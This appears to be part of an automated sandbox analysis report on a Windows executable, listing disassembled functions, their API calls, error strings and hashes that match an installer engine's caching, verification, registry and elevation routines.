                                                            • Engine is active, cannot change engine state., xrefs: 0088F668
                                                            • Failed to set download password., xrefs: 0088F777
                                                            • UX denied while trying to set download URL on embedded payload: %ls, xrefs: 0088F6B9
                                                            • Failed to set download user., xrefs: 0088F751
                                                            • UX requested unknown container with id: %ls, xrefs: 0088F6F3
                                                            • UX did not provide container or payload id., xrefs: 0088F7B8
                                                            • Failed to set download URL., xrefs: 0088F728
                                                            • UX requested unknown payload with id: %ls, xrefs: 0088F6A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                            • API String ID: 3168844106-2615595102
                                                            • Opcode ID: eb705ae383cfb25af5d02913d9bddee73fb13bab6f6e70baeb10b9e8a65e4159
                                                            • Instruction ID: 4ddf8d09e4e6aaf16946f3025e39f2b3a1f6f7a566801e4ce068e3f5758f5232
                                                            • Opcode Fuzzy Hash: eb705ae383cfb25af5d02913d9bddee73fb13bab6f6e70baeb10b9e8a65e4159
                                                            • Instruction Fuzzy Hash: FB41C732900696ABEB21BB28CC45F6A7378FF14714B158139E914E7252E774ED40C791
                                                            Function 008B5A5E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196filememoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000410,000000FF,?,00000000,00000000), ref: 008B5A9B
                                                            • GetLastError.KERNEL32 ref: 008B5AA9
                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 008B5AEA
                                                            • GetLastError.KERNEL32 ref: 008B5AF7
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 008B5C6A
                                                            • CloseHandle.KERNEL32(?), ref: 008B5C79
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                            • String ID: GET$dlutil.cpp
                                                            • API String ID: 2028584396-3303425918
                                                            • Opcode ID: d8814bf5456822466b38d2251979e41e428210b3e0e59069a21f0a0619f56489
                                                            • Instruction ID: 8c7a416266e39db2a48068f1f746edcd4bb74ffd4f9a83310fe6e8b9504a581f
                                                            • Opcode Fuzzy Hash: d8814bf5456822466b38d2251979e41e428210b3e0e59069a21f0a0619f56489
                                                            • Instruction Fuzzy Hash: 41613A7290061AABDB21DFA4CC45BEEBBB9FF48764F150219FD15F6340E77099409B90
                                                            Function 00880C50 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00881020: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,00880C6F,?,00000000,?,00000000,00000000), ref: 0088104F
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 00880DF3
                                                            • GetLastError.KERNEL32 ref: 00880E00
                                                            Strings
                                                            • Failed to append cache action., xrefs: 00880D4A
                                                            • Failed to append rollback cache action., xrefs: 00880CCF
                                                            • Failed to create syncpoint event., xrefs: 00880E2E
                                                            • Failed to append package start action., xrefs: 00880C95
                                                            • plan.cpp, xrefs: 00880E24
                                                            • Failed to append payload cache action., xrefs: 00880DAA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareCreateErrorEventLastString
                                                            • String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
                                                            • API String ID: 801187047-2489563283
                                                            • Opcode ID: 695506366036c620dac3dffc034ee7c2e41185b7e49d9049d601a6ad2bc32b66
                                                            • Instruction ID: 9bfbfa63811c4dd88b302e397a7133a5aa8395150453d8f21fc11274352821c4
                                                            • Opcode Fuzzy Hash: 695506366036c620dac3dffc034ee7c2e41185b7e49d9049d601a6ad2bc32b66
                                                            • Instruction Fuzzy Hash: 76617B75500609EFDB45EF58C980AAABBFAFF84310F21855AE805DB301EB31EE46DB50
                                                            Function 008B6EFF Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,74DEDFD0,000000FF,type,000000FF,?,74DEDFD0,74DEDFD0,74DEDFD0), ref: 008B6F55
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B6FA0
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B701C
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7068
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$Free$Compare
                                                            • String ID: `<u$type$url
                                                            • API String ID: 1324494773-1686489133
                                                            • Opcode ID: cc77268a52b2641947461993128f7ac2103c1be68047c84bad4ec5d4f5198eb0
                                                            • Instruction ID: 1ee2597ffcf494348da2686cbf9bf41837be817c8bb42433393aba838001a93a
                                                            • Opcode Fuzzy Hash: cc77268a52b2641947461993128f7ac2103c1be68047c84bad4ec5d4f5198eb0
                                                            • Instruction Fuzzy Hash: F6514B35905219EFCB15DBA4C884EEEBBB8FF04311F1442A9E511EB3A0DB71AE14DB50
                                                            Function 008805A2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 133registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,008BB500,00000000,?), ref: 008806D3
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,008BB500,00000000,?), ref: 008806E2
                                                              • Part of subcall function 008B0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,0088061A,?,00000000,00020006), ref: 008B0C0E
                                                            Strings
                                                            • Failed to update resume mode., xrefs: 008806B7
                                                            • %ls.RebootRequired, xrefs: 008805F0
                                                            • Failed to write volatile reboot required registry key., xrefs: 0088061E
                                                            • Failed to delete registration key: %ls, xrefs: 00880681
                                                            • crypt32.dll, xrefs: 008805AC
                                                            • Failed to open registration key., xrefs: 0088071A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Close$Create
                                                            • String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.$crypt32.dll
                                                            • API String ID: 359002179-3398658923
                                                            • Opcode ID: 9b3268f93b222fa94bc420e26786508cac7aae7267ac14510aa43e4feb4acc31
                                                            • Instruction ID: a70187a72e9617b921c1f45ed1d8a42c4b7ea50062a42ab2ba076bb6ad46598d
                                                            • Opcode Fuzzy Hash: 9b3268f93b222fa94bc420e26786508cac7aae7267ac14510aa43e4feb4acc31
                                                            • Instruction Fuzzy Hash: 9F418F32800709FADF22AEA4CC06EAF7BB5FFA0310F144419F515E1261E7719A68DF52
                                                            Function 0087F451 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087F48A
                                                              • Part of subcall function 00874115: CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0088A0E8,00000000,00000000,?,00000000,008753BD,00000000,?,?,0087D5B5,?), ref: 00874123
                                                              • Part of subcall function 00874115: GetLastError.KERNEL32(?,0088A0E8,00000000,00000000,?,00000000,008753BD,00000000,?,?,0087D5B5,?,00000000,00000000), ref: 00874131
                                                            • lstrlenA.KERNEL32(008BB500,00000000,00000094,00000000,00000094,?,?,008804BF,swidtag,00000094,?,008BB518,008804BF,00000000,?,00000000), ref: 0087F4DD
                                                              • Part of subcall function 008B4DB3: CreateFileW.KERNEL32(008BB500,40000000,00000001,00000000,00000002,00000080,00000000,008804BF,00000000,?,0087F4F4,?,00000080,008BB500,00000000), ref: 008B4DCB
                                                              • Part of subcall function 008B4DB3: GetLastError.KERNEL32(?,0087F4F4,?,00000080,008BB500,00000000,?,008804BF,?,00000094,?,?,?,?,?,00000000), ref: 008B4DD8
                                                            Strings
                                                            • Failed to write tag xml to file: %ls, xrefs: 0087F51B
                                                            • Failed to allocate regid file path., xrefs: 0087F535
                                                            • swidtag, xrefs: 0087F49D
                                                            • Failed to format tag folder path., xrefs: 0087F543
                                                            • Failed to create regid folder: %ls, xrefs: 0087F525
                                                            • Failed to allocate regid folder path., xrefs: 0087F53C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
                                                            • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
                                                            • API String ID: 904508749-1201533908
                                                            • Opcode ID: d47d38cbbc0b27f1349eb9eab771f94fff68f1f5da148c46458b9f93296d2611
                                                            • Instruction ID: 5da01548fe01820125e3294bba9391e4b140ff8a6932b3c0bc43e9dd59097f9c
                                                            • Opcode Fuzzy Hash: d47d38cbbc0b27f1349eb9eab771f94fff68f1f5da148c46458b9f93296d2611
                                                            • Instruction Fuzzy Hash: 73319A31C40619BBCF21AE99CC41BADBBB4FF04710F108166EA18FA266E770DA509B91
                                                            Function 008853E2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 91synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,0087548E,00000000,00000000,?,00000000), ref: 0088548B
                                                            • GetLastError.KERNEL32(?,?,?,00874C61,?,?,00000000,?,?,?,?,?,?,008BB4A0,?,?), ref: 00885496
                                                            Strings
                                                            • Failed to wait for child process exit., xrefs: 008854C4
                                                            • Failed to write restart to message buffer., xrefs: 0088542E
                                                            • pipe.cpp, xrefs: 008854BA
                                                            • Failed to post terminate message to child process., xrefs: 00885476
                                                            • Failed to post terminate message to child process cache thread., xrefs: 0088545A
                                                            • Failed to write exit code to message buffer., xrefs: 00885406
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait
                                                            • String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
                                                            • API String ID: 1211598281-2161881128
                                                            • Opcode ID: bc03442f278a7682d81ceba99f8f20e2a2213ef34de1c19498609b98fb789441
                                                            • Instruction ID: 17abdf21fedba74ca6332e1bd13bc9d3ae3b88cf2ff8d4a1f919e9df6b062b32
                                                            • Opcode Fuzzy Hash: bc03442f278a7682d81ceba99f8f20e2a2213ef34de1c19498609b98fb789441
                                                            • Instruction Fuzzy Hash: 99210673940A2ABBDF126A94DC05E9E7778FF00726F204265F910F6290D734ED9097D9
                                                            Function 00889098 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,00889F04,00000003,000007D0,00000003,?,000007D0), ref: 008890B2
                                                            • GetLastError.KERNEL32(?,00889F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 008890BF
                                                            • CloseHandle.KERNEL32(00000000,?,00889F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 00889187
                                                            Strings
                                                            • cache.cpp, xrefs: 008890F6
                                                            • Failed to open payload at path: %ls, xrefs: 00889103
                                                            • Failed to verify signature of payload: %ls, xrefs: 0088912F
                                                            • Failed to verify hash of payload: %ls, xrefs: 00889172
                                                            • Failed to verify catalog signature of payload: %ls, xrefs: 0088914E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorFileHandleLast
                                                            • String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                            • API String ID: 2528220319-2757871984
                                                            • Opcode ID: 10931cedabcfcc99bfd2239e79f6655e166d0c22df7344ec39203525b41dc0ab
                                                            • Instruction ID: 9975cb896dbaa09a646220aaf2fc768fadccf92c23bafb1276536d4c7af0c684
                                                            • Opcode Fuzzy Hash: 10931cedabcfcc99bfd2239e79f6655e166d0c22df7344ec39203525b41dc0ab
                                                            • Instruction Fuzzy Hash: 6121B43A944627BACB323A588C4DFBA7A28FF00760F194311FD55F569093399C61EBD1
                                                            Function 00876B1E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00876B69
                                                            • GetLastError.KERNEL32 ref: 00876B73
                                                            • GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00876BB7
                                                            • GetLastError.KERNEL32 ref: 00876BC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$DirectoryNamePathVolumeWindows
                                                            • String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
                                                            • API String ID: 124030351-4026719079
                                                            • Opcode ID: 71499c83448c24411146ff7326fd66f1fef812ba17b74f514c557ab1976a656b
                                                            • Instruction ID: fd11f7edccccb6b24f8da895a4f463e42ca6fb0cd5f6ecac295a8616f9ad8c04
                                                            • Opcode Fuzzy Hash: 71499c83448c24411146ff7326fd66f1fef812ba17b74f514c557ab1976a656b
                                                            • Instruction Fuzzy Hash: 01210773E4163967D720A6588D46FDA77ACFB40B20F118175BD08F7241F634ED404AE6
                                                            Function 00879C6D Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 00879C88
                                                            • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,000002C0,?,0087A895,00000100,000002C0,000002C0,?,000002C0), ref: 00879CA0
                                                            • GetLastError.KERNEL32(?,0087A895,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00879CAB
                                                            Strings
                                                            • search.cpp, xrefs: 00879CDB
                                                            • Failed to format variable string., xrefs: 00879C93
                                                            • Failed get to file attributes. '%ls', xrefs: 00879CE8
                                                            • Failed to set variable., xrefs: 00879D2B
                                                            • File search: %ls, did not find path: %ls, xrefs: 00879CFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AttributesErrorFileLastOpen@16
                                                            • String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
                                                            • API String ID: 1811509786-2053429945
                                                            • Opcode ID: d6edd7eeefedeb4eb649abe5e812c72579f9de99c7bd79f94a5bb67d288ed3bd
                                                            • Instruction ID: 9f51197b89206f55685bc9f1b7365159873574bed693f7a3191ae46a7162c404
                                                            • Opcode Fuzzy Hash: d6edd7eeefedeb4eb649abe5e812c72579f9de99c7bd79f94a5bb67d288ed3bd
                                                            • Instruction Fuzzy Hash: 08214933940124FAEB2216988D46FEEBB68FF11761F208221FD5CF6294D721DD0096D2
                                                            Function 0088AD40 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsSetValue.KERNEL32(?,?), ref: 0088AD57
                                                            • GetLastError.KERNEL32 ref: 0088AD61
                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 0088ADA0
                                                            • CoUninitialize.OLE32(?,0088C721,?,?), ref: 0088ADDD
                                                            Strings
                                                            • elevation.cpp, xrefs: 0088AD85
                                                            • Failed to initialize COM., xrefs: 0088ADAC
                                                            • Failed to set elevated cache pipe into thread local storage for logging., xrefs: 0088AD8F
                                                            • Failed to pump messages in child process., xrefs: 0088ADCB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorInitializeLastUninitializeValue
                                                            • String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
                                                            • API String ID: 876858697-113251691
                                                            • Opcode ID: 23b4f59a2dc14f07811b84cdcd142f0bbe37705a31a078e1309d48e89271f47c
                                                            • Instruction ID: 5752810e92b708d0196538b8c325a7dc053734c9c489e5d69f1bda8a66db7638
                                                            • Opcode Fuzzy Hash: 23b4f59a2dc14f07811b84cdcd142f0bbe37705a31a078e1309d48e89271f47c
                                                            • Instruction Fuzzy Hash: 55112333941635BBA6262749CC09D9FBBA8FF04B627014216FC00F7390EBB09C0087D2
                                                            Function 00875CE2 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 54registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00875D68
                                                              • Part of subcall function 008B10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008B112B
                                                              • Part of subcall function 008B10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008B1163
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Close
                                                            • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 1979452859-3209209246
                                                            • Opcode ID: ea14493ffab5f9ec1444196a95caff820c79fa5dcae87ec334448670d942bde2
                                                            • Instruction ID: 5f511e98a17a1c0ae82bdd553539aa488780def3e3378124574c15b28de75bac
                                                            • Opcode Fuzzy Hash: ea14493ffab5f9ec1444196a95caff820c79fa5dcae87ec334448670d942bde2
                                                            • Instruction Fuzzy Hash: 6401D632A41A29B7CB3256988C0AEEE7B68FB00720F148165F908FA36097B5CE009691
                                                            Function 0089A271 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 0089A33E
                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0089A348
                                                            Strings
                                                            • apply.cpp, xrefs: 0089A36C
                                                            • Failed attempt to download URL: '%ls' to: '%ls', xrefs: 0089A425
                                                            • Failed to clear readonly bit on payload destination path: %ls, xrefs: 0089A377
                                                            • :, xrefs: 0089A3C1
                                                            • download, xrefs: 0089A308
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AttributesErrorFileLast
                                                            • String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
                                                            • API String ID: 1799206407-1905830404
                                                            • Opcode ID: 31c63f096a53246d1eb065e45506e8fc1dfd19df4d45937c3b2e7eb9ce7bfc79
                                                            • Instruction ID: 3173d1e6d85aaeb01d4b429cbd5ad6f223ead50b63a6222055338d2c7e27f9ce
                                                            • Opcode Fuzzy Hash: 31c63f096a53246d1eb065e45506e8fc1dfd19df4d45937c3b2e7eb9ce7bfc79
                                                            • Instruction Fuzzy Hash: 03519E71A00219ABDF15EFA9C841EAEB7B9FF14710F188159E904EB340E775EA40DBD2
                                                            Function 008B84C7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 156COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,00899063,000002C0,00000100), ref: 008B84F5
